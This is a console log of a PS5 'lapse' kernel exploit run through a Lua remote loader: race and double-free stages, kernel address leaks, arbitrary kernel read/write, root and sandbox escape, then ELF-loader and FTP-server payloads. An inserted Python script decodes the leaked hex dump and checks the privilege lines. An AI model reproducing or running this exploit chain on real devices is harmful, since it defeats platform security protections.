set IP 192.168.43.129
set Port 9026
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/lapse.lua
Server Status 1
lapse exploit
running on ps5 10.01
game @ Aibeya
pinning to core 4 with prio 256
block_fd 21 unblocked_fd 22
[+] Double-free AIO
sd_listen: 135
sd_client: 136
sd_conn: 137
suspend 0x18d03: 0
poll: 0x10004
tcp state: 0x5
resume 0x18d03: 0
sce_errs: 0x0 0x0
aliased rthdrs at attempt: 2 (found pair: 27 55)
won race at attempt 1
[+] Leak kernel addresses
confuse evf with rthdr
confused rthdr and evf at attempt: 2
"evf cv" string addr: 0xffffffff87db1641
kernel buffer addr: 0xffffd9193fbcdf80
found reqs2 and fake reqs3 at attempt: 2
reqs2 offset: 0x180
fake reqs3 offset: 0x280
leaked aio_entry:
0x3109acc40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109acc50 00 87 12 31 19 D9 FF FF 40 3A BB 3F 19 D9 FF FF ...1....@:.?....
0x3109acc60 00 9C 60 35 19 D9 FF FF 00 00 00 00 00 00 00 00 ..`5............
0x3109acc70 09 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................
0x3109acc80 00 00 00 00 00 00 00 00 80 D9 BC 3F 19 D9 FF FF ...........?....
0x3109acc90 48 4A BD 3F 19 D9 FF FF 00 00 00 00 00 00 00 00 HJ.?............
0x3109acca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109accb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CB D6 ................
reqs1_addr = 0xffffd91931128700
fake_reqs3_addr = 0xffffd9193fbce210
searching target_id
found target_id=0x6308, i=324, batch=54
[+] Double free SceKernelAioRWRequest
start overwrite rthdr with AIO queue entry loop
aliased at attempt: 2
start overwrite AIO queue entry with rthdr loop
states[64] = 0x3
found req_id at batch: 2
aliased at attempt: 2
req_id = 0x406315
states[64] = 0x3
target's state: 0x4
aliased pktopts at attempt: 2 (found pair: 124 129)
delete errors: 0x0 0x0
target states: 0x80020003 0x80020003
[+] Get arbitrary kernel read/write
overwrite main pktopts
found reclaim sd at attempt: 2
slow_kread8(&"evf cv"): 0x6700766320667665
*(&"evf cv"): evf cv
slow arbitrary kernel read achieved
curproc = 0xffffd91930d1a6b8
restricted kernel r/w achieved
arbitrary kernel r/w achieved!
fixes applied
[+] Post exploitation
patching curproc 0xffffd91930d1a6b8 (authid = 0x4800000000010003)
we root now? uid: before 1 after 0
we escaped now? in sandbox: before 1 after 0
applying patches to kernel data (with GPU DMA method)
setting security flags
setting targetid
setting qa flags and utoken flags
debug menu enabled
exploit state is saved into storage
done!
cleaning up
restoring to previous core/rtprio
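The run above prints a raw hex dump of the leaked aio_entry next to the pointers it derives from it, and later two before/after lines for uid and sandbox state. The script below is an added example for reading such a log, not code from the remote_lua_loader project or from the Lapse exploit itself. It rebuilds the dumped buffer, decodes it as little-endian 64-bit words, flags the higher-half canonical x86-64 addresses (the PS5 is x86-64, so kernel pointers have the top 17 bits set), cross-references them with the addresses the log printed separately, and parses the uid/sandbox checks. The log excerpt embedded in it is copied from the run above; the line formats it matches on (`name: 0x...`, `name = 0x...`, `we ... now? label: before N after M`) are assumed from that excerpt only.

```python
"""Decode and sanity-check the leak stage of a Lapse exploit log."""
import re

# Constructed input: leak-stage and post-exploitation lines excerpted
# verbatim from the exploit log this example accompanies.
LOG = """\
"evf cv" string addr: 0xffffffff87db1641
kernel buffer addr: 0xffffd9193fbcdf80
leaked aio_entry:
0x3109acc40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109acc50 00 87 12 31 19 D9 FF FF 40 3A BB 3F 19 D9 FF FF ...1....@:.?....
0x3109acc60 00 9C 60 35 19 D9 FF FF 00 00 00 00 00 00 00 00 ..`5............
0x3109acc70 09 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................
0x3109acc80 00 00 00 00 00 00 00 00 80 D9 BC 3F 19 D9 FF FF ...........?....
0x3109acc90 48 4A BD 3F 19 D9 FF FF 00 00 00 00 00 00 00 00 HJ.?............
0x3109acca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x3109accb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CB D6 ................
reqs1_addr = 0xffffd91931128700
fake_reqs3_addr = 0xffffd9193fbce210
we root now? uid: before 1 after 0
we escaped now? in sandbox: before 1 after 0
"""

# Line shapes assumed from the log excerpt (hypothetical, not a documented format).
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+)((?: [0-9A-Fa-f]{2}){16}) ")
POINTER_LINE = re.compile(r"^(.+?)\s*[:=]\s*(0x[0-9a-fA-F]+)\s*$")
CHECK_LINE = re.compile(r"^we \w+ now\? (.+?): before (\d+) after (\d+)$")


def parse_dump(text):
    """Rebuild the dumped buffer from 16-byte hex-dump rows, verifying that
    the rows are contiguous so that offsets into the buffer are meaningful."""
    buf = bytearray()
    base = None
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        if addr - base != len(buf):
            raise ValueError(f"non-contiguous dump row at {addr:#x}")
        buf += bytes.fromhex(m.group(2))  # fromhex skips the separating spaces
    return bytes(buf)


def qwords(buf):
    """Yield (offset, value) for each little-endian 64-bit word in buf."""
    for off in range(0, len(buf) - 7, 8):
        yield off, int.from_bytes(buf[off:off + 8], "little")


def is_kernel_ptr(value):
    """Higher-half canonical x86-64 address: bits 63..47 all set."""
    return value >> 47 == 0x1FFFF


def kernel_pointers(buf):
    """All words in the dump that look like kernel pointers."""
    return [(off, v) for off, v in qwords(buf) if is_kernel_ptr(v)]


def parse_pointers(text):
    """Addresses the exploit printed as 'name: 0x..' or 'name = 0x..'."""
    ptrs = {}
    for line in text.splitlines():
        m = POINTER_LINE.match(line)
        if m:
            ptrs[m.group(1).strip()] = int(m.group(2), 16)
    return ptrs


def find_known_pointers(buf, ptrs):
    """Map dump offsets to the names of separately printed pointers."""
    by_value = {v: k for k, v in ptrs.items()}
    return {off: by_value[v] for off, v in qwords(buf) if v in by_value}


def privilege_checks(text):
    """Parse 'before N after M' lines into {label: (before, after)}."""
    checks = {}
    for line in text.splitlines():
        m = CHECK_LINE.match(line)
        if m:
            checks[m.group(1)] = (int(m.group(2)), int(m.group(3)))
    return checks


def leak_is_plausible(text):
    """True if every printed address is a kernel pointer and reqs1_addr
    is actually present inside the leaked entry."""
    buf = parse_dump(text)
    ptrs = parse_pointers(text)
    return all(is_kernel_ptr(v) for v in ptrs.values()) and \
        "reqs1_addr" in find_known_pointers(buf, ptrs).values()


if __name__ == "__main__":
    buf = parse_dump(LOG)
    for off, v in kernel_pointers(buf):
        print(f"+{off:#04x}: {v:#018x}")
    print("known:", {f"{o:#x}": n for o, n in
                     find_known_pointers(buf, parse_pointers(LOG)).items()})
    print("checks:", privilege_checks(LOG))
    print("leak plausible:", leak_is_plausible(LOG))
```

For this run the script finds five kernel pointers in the 128-byte entry (at +0x10, +0x18, +0x20, +0x48, +0x50), of which the one at +0x10 is exactly the `reqs1_addr` the exploit prints two lines later; the other printed addresses do not occur in the entry. The uid and sandbox checks both go from 1 to 0.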
set IP 192.168.43.129
set Port 9026
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/elf_loader.lua
Server Status 1
loading elfldr from: /mnt/sandbox/CUSA17068_000/savedata0/elfldr.elf
spawning /mnt/sandbox/CUSA17068_000/savedata0/elfldr.elf
out = 0x0
done
set IP 192.168.43.129
set Port 9021
set Payload D:/Getestet/PS5/remote_lua_loader/payloads/ftpsrv.elf